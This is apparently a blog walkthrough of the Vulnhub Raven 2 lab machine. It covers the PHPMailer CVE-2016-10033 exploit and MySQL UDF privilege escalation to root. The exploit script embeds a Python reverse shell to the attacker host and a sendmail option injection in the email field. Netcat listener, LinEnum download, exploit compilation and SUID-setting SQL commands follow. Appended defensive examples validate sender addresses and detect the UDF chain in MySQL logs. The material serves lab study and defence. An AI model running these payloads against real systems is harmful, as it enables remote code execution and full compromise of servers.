Last updated: October 15, 2021 12:52:23

# Understanding UDF

When MySQL's built-in functions are not enough, MySQL provides a mechanism for adding new functions. A function you add yourself is called a UDF (User Defined Function).

In MySQL 5.1 and later, UDFs live in the `mysql/lib/plugin` directory, with a `.dll` extension (on Windows; `.so` on Linux), and are usually written in C.

# How UDF privilege escalation works

A user can define a function that performs a privileged action (for example, executing system commands) and use it to escalate privileges.

# Prerequisites for UDF privilege escalation

1. For MySQL versions above 5.1, the udf.dll file must be placed in the `lib\plugin` folder under the MySQL installation directory.

2. For MySQL versions below 5.1, udf.dll goes in `c:\windows\system32` on Windows 2003 and in `c:\winnt\system32` on Windows 2000.

3. The MySQL account you control has INSERT and DELETE privileges on the `mysql` database, so that functions can be created and dropped. root is best; any other account with root-equivalent privileges also works. Here root is allowed to connect remotely (`grant all PRIVILEGES on *.* to 'root'@'192.168.189.1' identified by '112358';` lets root connect from the specified IP).

4. Permission to write udf.dll into the corresponding directory.

# Reproduction

**Environment**

Attacker: Kali (192.168.112.129)

Target: https://www.vulnhub.com/entry/raven-2,269/ (192.168.112.145)

**Steps**

1. Start the target VM and scan for its IP from Kali.

![Screenshot 2021-10-15 104120.jpg][1]

2. Visit port 80 and scan the site directories.

> dirb http://192.168.112.145/

3. It is a WordPress site, and the scan turns up several directories.

![05916.jpg][2]

4. Visiting them one by one, the /vendor directory has directory listing enabled. The PATH file reveals flag1 and the web root.

![21.jpg][3]

![409.jpg][4]

5. The `PHPMailerAutoload.php` file points to the PHPMailer remote code execution vulnerability (CVE-2016-10033).

Root cause: PHPMailer sends mail by invoking the Linux sendmail command, and takes the host name from SERVER_NAME (the request's Host value), which is not filtered at all; this is what creates the vulnerability. Since exim4 replaces sendmail's functionality, functions such as substr and run can be used to bypass and construct a payload.

Exploit script:

```python
from requests_toolbelt import MultipartEncoder
import requests
import os

os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

# Target address and the file name to write
target = 'http://192.168.112.145/'
backdoor = '/shell.php'

# Attacker IP and port (used to receive the reverse shell)
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,' \
          'socket.SOCK_STREAM);s.connect((\\\'192.168.112.129\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),' \
          '1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?> '
# payload = '<?php @eval($_POST["cmd"]); ?>'

# Web root path and file name
fields = {'action': 'submit',
          'name': payload,
          'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
          'message': 'Pwned'}

m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type}
# proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(), headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target + backdoor, headers=headers)
if r.status_code == 200:
    print('[+] ExPLoITeD ' + target)
```

After it runs successfully:

![102.jpg][5]

6. On Kali, listen on port 4444.

> nc -lvnp 4444

![20652.jpg][6]

Check the database password in wp-config.php under the WordPress directory.

![120825.jpg][7]

7. The nc shell does not support interactive su, so use `python -c 'import pty;pty.spawn("/bin/bash")'` to spawn an interactive shell.

![50.jpg][8]

8. Use `LinEnum.sh`.

> wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
> chmod 777 LinEnum.sh
> ./LinEnum.sh

9. Escalate via UDF. First locate the exploit source (`/usr/share/exploitdb/exploits/linux/local/1518.c`).

10. Compile the exploit.

> gcc -g -c 1518.c
> gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc

11. Upload 1518.so to the target (you can create a webshell and upload it through an AntSword connection).

12. Connect to MySQL.

![22516.jpg][9]

13. Escalate privileges.

First select a database:

```
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
```

Create table foo:

```
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.02 sec)
```

Read 1518.so and insert it as a row in foo:

```
mysql> insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.01 sec)
```

Select the row just inserted and dump it to `/usr/lib/mysql/plugin/1518.so` (where MySQL keeps user-defined functions):

```
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.00 sec)
```

Load 1518.so to create the user-defined function:

```
mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.01 sec)
```

Check the mysql.func table:

```
mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)
```

Run `chmod u+s /usr/bin/find`:

```
mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)
```

Exit MySQL:

```
mysql> quit
Bye
```

Create a file named foo with `touch foo`, then run whoami through find; it returns root, so we now have root privileges:

```
www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
root
```

[1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/4006653621.jpg
[2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2264684343.jpg
[3]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3726272006.jpg
[4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3432633861.jpg
[5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/1306386926.jpg
[6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/3163546189.jpg
[7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2647236151.jpg
[8]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/1916809068.jpg
[9]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/10/2543730559.jpg
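As an added defensive example for the root cause in step 5 (not code from the original post or from PHPMailer), a simplified Python allowlist check on a sender address before it is handed to sendmail: the regex, function names and the benign address are assumptions, and the rejected address is the one used in the exploit script above.

```python
import re

# Constructed inputs: a benign sender, and the address from the exploit script,
# which smuggles sendmail options (-O, -X) inside a quoted local part.
BENIGN_SENDER = "alice@example.com"
INJECTED_SENDER = (
    '"anarcoder\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server" @protonmail.com'
)

# Strict allowlist (assumed policy): dot-atom local part, dotted domain, nothing
# else. Quoted local parts, whitespace and backslashes are rejected outright,
# so no extra arguments can ride along in the address.
_ATOM = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
_ADDR_RE = re.compile(
    rf"^{_ATOM}(\.{_ATOM})*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$"
)


def is_safe_sender(addr: str) -> bool:
    """True only for a plain dot-atom address with no whitespace, quotes or
    backslashes; anything that could carry sendmail flags fails."""
    if len(addr) > 254 or any(c in addr for c in ' \t\r\n"\\'):
        return False
    return _ADDR_RE.fullmatch(addr) is not None


def build_sendmail_argv(sender: str) -> list[str]:
    """Build the argv a mailer would pass to sendmail as a list (no shell
    involved), raising instead of building anything for a rejected sender."""
    if not is_safe_sender(sender):
        raise ValueError(f"rejected sender address: {sender!r}")
    return ["/usr/sbin/sendmail", "-t", "-i", "-f", sender]
```

Passing the argv as a list to a process API rather than interpolating it into a shell command string is the second half of the mitigation; the allowlist alone keeps option-like text out of the address.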
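As an added detection example (not part of the original post), a Python scan of MySQL general_log lines for the UDF chain in step 13: LOAD_FILE into a blob table, SELECT ... INTO DUMPFILE aimed at the plugin directory, and CREATE FUNCTION ... SONAME. The log excerpt is constructed to mirror the session above, and the TIME / THREAD_ID / COMMAND / ARGUMENT line layout is assumed.

```python
import re
from collections import defaultdict

# Constructed general_log excerpt (TIME<TAB>THREAD_ID COMMAND<TAB>ARGUMENT),
# thread 12 replays the session from the post; thread 13 is benign noise.
SAMPLE_LOG = """\
2021-10-15T04:00:01Z\t12 Query\tuse wordpress
2021-10-15T04:00:02Z\t12 Query\tcreate table foo(line blob)
2021-10-15T04:00:05Z\t12 Query\tinsert into foo values(load_file('/var/www/html/1518.so'))
2021-10-15T04:00:09Z\t12 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'
2021-10-15T04:00:12Z\t12 Query\tcreate function do_system returns integer soname '1518.so'
2021-10-15T04:00:15Z\t12 Query\tselect do_system('chmod u+s /usr/bin/find')
2021-10-15T04:01:00Z\t13 Query\tselect * from wp_posts limit 5
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<tid>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# Each stage of the UDF chain, matched case-insensitively against the SQL text.
STAGES = {
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "dumpfile_plugin": re.compile(r"\binto\s+dumpfile\s+'[^']*plugin[^']*'", re.I),
    "create_function_soname": re.compile(r"\bcreate\s+function\b.*\bsoname\b", re.I),
}


def scan_general_log(text: str) -> dict[str, list[str]]:
    """Return {thread_id: [stages seen, in order]} for threads hitting any stage."""
    seen: dict[str, list[str]] = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        for name, rx in STAGES.items():
            if rx.search(m["arg"]) and name not in seen[m["tid"]]:
                seen[m["tid"]].append(name)
    return dict(seen)


def udf_alerts(text: str) -> list[tuple[str, str]]:
    """High: one thread both wrote into the plugin dir and created a SONAME
    function. Medium: either action alone. Returns (thread_id, severity)."""
    alerts = []
    for tid, stages in scan_general_log(text).items():
        if "dumpfile_plugin" in stages and "create_function_soname" in stages:
            alerts.append((tid, "high"))
        elif "dumpfile_plugin" in stages or "create_function_soname" in stages:
            alerts.append((tid, "medium"))
    return alerts
```

Pairing this with a periodic diff of `mysql.func` against an allowlist of expected UDFs catches the same chain after the fact, since the created function persists even if the log has rotated.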